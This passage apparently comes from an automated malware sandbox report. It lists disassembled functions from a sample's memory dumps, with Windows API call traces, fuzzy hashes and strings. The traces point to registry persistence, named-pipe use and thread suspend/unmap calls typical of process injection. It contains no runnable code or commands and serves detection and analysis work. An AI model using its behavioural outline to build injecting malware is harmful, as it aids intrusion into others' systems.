    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7B90, Relevance: 7.6, APIs: 5, Instructions: 62 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
